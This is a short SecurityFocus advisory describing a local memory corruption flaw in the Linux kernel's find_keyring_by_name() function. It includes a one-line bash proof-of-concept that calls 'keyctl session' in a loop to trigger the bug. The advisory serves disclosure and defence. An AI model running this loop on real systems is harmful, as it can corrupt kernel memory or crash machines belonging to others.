Linux Kernel 'find_keyring_by_name()' Local Memory Corruption Vulnerability

Local attackers can exploit this issue with readily available tools.

The following proof-of-concept is available:

for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done


 

Privacy Statement
Copyright 2010, SecurityFocus